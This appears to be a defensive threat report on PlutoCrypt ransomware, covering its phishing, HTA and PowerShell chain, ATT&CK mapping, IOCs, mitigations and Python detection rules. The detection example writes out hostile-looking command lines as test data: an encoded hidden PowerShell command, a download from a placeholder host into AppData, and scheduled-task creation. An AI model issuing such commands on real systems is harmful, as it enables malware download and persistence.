Full Report
Pivoting through the execution chain of a CryptoJoker Ransomware copycat
Analysis Summary
# Tool/Technique: PlutoCrypt Ransomware (CryptoJoker Variant)
## Overview
PlutoCrypt is analyzed as a variant of the CryptoJoker Ransomware, demonstrating a multi-stage execution chain initiated via spear phishing. Its primary purpose is to encrypt user files and likely demand a ransom.
## Technical Details
- Type: Malware family (Ransomware variant)
- Platform: Windows (Implied by use of HTA, PowerShell, Wscript.Shell)
- Capabilities: Multi-stage execution, downloading secondary payloads using PowerShell, file encryption (implied by ransomware designation).
- First Seen: Not explicitly mentioned, but linked conceptually to CryptoJoker.
## MITRE ATT&CK Mapping
The execution chain shows techniques related to initial access, execution, and defense evasion through complex scripting and file manipulation.
- **TA0001 - Initial Access**
  - T1566 - Phishing
    - T1566.001 - Spearphishing Attachment (implied by the downloadable attachment in the email)
- **TA0002 - Execution**
  - T1204 - User Execution
    - T1204.002 - Malicious File
  - T1059 - Command and Scripting Interpreter
    - T1059.003 - Windows Command Shell
    - T1059.001 - PowerShell
- **TA0005 - Defense Evasion**
  - T1027 - Obfuscated Files or Information (JS obfuscation)
  - T1564.001 - Hide Artifacts: Hidden Files and Directories (implied by subsequent steps)
  - T1562.001 - Disable or Modify Tools (implied by subsequent steps like DLL sideloading)
## Functionality
### Core Capabilities
- Initial delivery via spear-phishing email targeting Turkish individuals/organizations.
- Execution starts with a compressed HTML Application (.hta) file containing obfuscated JavaScript.
- JavaScript utilizes `Wscript.Shell` to execute an encoded PowerShell script.
- PowerShell script is responsible for downloading subsequent XML/data files (`x.xml`, `task.xml`, `t.pd`, `u.dl`) and an executable (`pl.exe`) from specified URLs.
- Staging of files such as `task.xml` and `iotlog.pdf` in the `%env:appdata%` directory.
- Execution of the staged components via `schtasks.exe` (driven by the downloaded task XML) and `Start-Process`.
### Advanced Features
- **Multi-stage infection chain:** Heavily layered execution involving HTA -> Obfuscated JS -> Encoded PowerShell -> File downloads -> Final Payload execution.
- **Defense Evasion:** Duplicates System32 folders and uses DLL sideloading (implied by the interaction with `uxtheme.dll`).
- **Dynamic Payload Retrieval:** Downloads necessary components from C2 infrastructure using `Invoke-WebRequest`.
## Indicators of Compromise
- File Hashes (SHA-256):
  - vakifbank iot-10-04-2023logs.rar: `9026c67b52f9ddece9a7e203978e8aa9ffa5a128cf83a238c924dce141899aec`
  - vakifbank iot-10-04-2023logs.hta: `b05328077aa1dd5dba4d8e25cb028dc4f533bd1dd69bc6d12ec2f8298598f803`
  - task.xml: `6cbed31fdf5554ead21de9ccdd12ccc6d9f0b4eaf5f874ce96103ab01f522073`
  - uxtheme.dll: `8279282e07e2fa82cad4f0cb0b450e77dab930a7db7c9488f663002753d79dde`
  - x.xml: `df38a5d9d7d6c9cfea65eb562317f71bea94a0fc731e1fe9121f9479e56f61fd`
  - enc.xml: `20cf29f926a18b44f580137ddb65d81bc0ed419412910a7682ee7b95b186ac82`
  - pl.exe: `e8527f309846d18fbf85289283dcde7b19063a50b11263ba0d36663df8fcfd30`
- File Names:
  - Initial archive: `vakifbank iot-10-04-2023logs.rar`
  - HTA stage: `vakifbank iot-10-04-2023logs.hta`
  - Downloaded stages: `x.xml`, `task.xml`, `iotlog.pd` (renamed to `iotlog.pdf`), `pl.exe`
  - Sideloaded DLL: `uxtheme.dll`
- Registry Keys: Not explicitly detailed in the provided text excerpt.
- Network Indicators:
  - http://hostdone[.]ddns[.]net/x1.xml
  - http://hostdone[.]ddns[.]net/task.xml
  - http://hostdone[.]ddns[.]net/t.pd
  - http://hostdone[.]ddns[.]net/u.dl
  - http://hostdone[.]ddns[.]net/pl.exe
  - http://hostdone[.]ddns[.]net/e
  - IP: `199.192.20[.]58`
  - Domain: `deni[.]tk`
- Behavioral Indicators:
  - Execution of an HTML Application (.hta) file.
  - Use of `Wscript.Shell` to execute encoded PowerShell.
  - Repeated HTTP GET requests to the same host to retrieve the staged components.
  - Use of `schtasks.exe` to create scheduled tasks.
  - DLL search order manipulation/sideloading.
## Associated Threat Actors
- Not explicitly named, but the malware family is related to **CryptoJoker** and potentially **NocryCrypt0r** based on shared BTC wallet history referenced in the article.
## Detection Methods
- Signature-based detection: match the file hashes listed above for the initial archive, the HTA stage, and the downloaded components.
- Behavioral detection: Monitoring for HTA execution that spawns PowerShell, heavy use of `Invoke-WebRequest` in scripts, and suspicious use of `schtasks.exe` or DLL sideloading patterns.
- YARA rules: Not provided in the source material.
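As an added example (not code from the original article), the behavioural checks listed above expressed as rules over constructed, Sysmon-style process-creation events; the host `example.invalid`, the user paths, and the encoded string are placeholders, not values from the sample:

```python
import ntpath
import re

# Constructed process-creation events (Sysmon Event ID 1 style fields); none of
# these lines are real telemetry from the analysed sample.
EVENTS = [
    {"parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -enc UABsAGEAYwBlAGgAbwBsAGQAZQByAA=="},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -c "Invoke-WebRequest http://example.invalid/t.pd -OutFile $env:APPDATA\\iotlog.pdf"'},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r"schtasks.exe /create /tn Update /xml C:\Users\u\AppData\Roaming\task.xml"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand; match the usual ones.
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)(?:\s|$)", re.I)

def _name(path):
    return ntpath.basename(path).lower()

def hta_spawns_powershell(ev):
    return _name(ev["parent"]) == "mshta.exe" and _name(ev["image"]) == "powershell.exe"

def encoded_powershell(ev):
    return _name(ev["image"]) == "powershell.exe" and bool(ENCODED_FLAG.search(ev["cmdline"]))

def powershell_web_download(ev):
    # Also worth applying to script-block log text (Event ID 4104): an encoded
    # first stage keeps the cmdlet out of the process command line itself.
    cmd = ev["cmdline"].lower()
    return _name(ev["image"]) == "powershell.exe" and ("invoke-webrequest" in cmd or re.search(r"\biwr\b", cmd) is not None)

def schtasks_xml_from_appdata(ev):
    cmd = ev["cmdline"].lower()
    return _name(ev["image"]) == "schtasks.exe" and "/create" in cmd and "/xml" in cmd and "appdata" in cmd

RULES = {"hta_spawns_powershell": hta_spawns_powershell, "encoded_powershell": encoded_powershell,
         "powershell_web_download": powershell_web_download, "schtasks_xml_from_appdata": schtasks_xml_from_appdata}

def evaluate(events):
    """Map event index -> names of the rules that fired, for events hitting at least one rule."""
    return {i: [n for n, rule in RULES.items() if rule(ev)] for i, ev in enumerate(events)
            if any(rule(ev) for rule in RULES.values())}
```

The benign `notepad.exe` event is there to show the rules stay quiet on ordinary activity; in production the same predicates would run over the EDR or Sysmon feed rather than the inline list.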
## Mitigation Strategies
- Email Gateway filtering to block suspicious attachments (RAR, HTA).
- User training emphasizing caution regarding unsolicited emails, especially those impersonating financial institutions (Vakifbank).
- Application control policies to restrict the execution of HTA files or scripts in sensitive environments.
- Implementing network egress filtering to block connections to known malicious domains/IPs.
- Enforcing robust permissions to limit the ability of dropped binaries to write to system paths or establish persistence.
## Related Tools/Techniques
- CryptoJoker (Base ransomware family)
- DLL Sideloading
- System32 folder duplication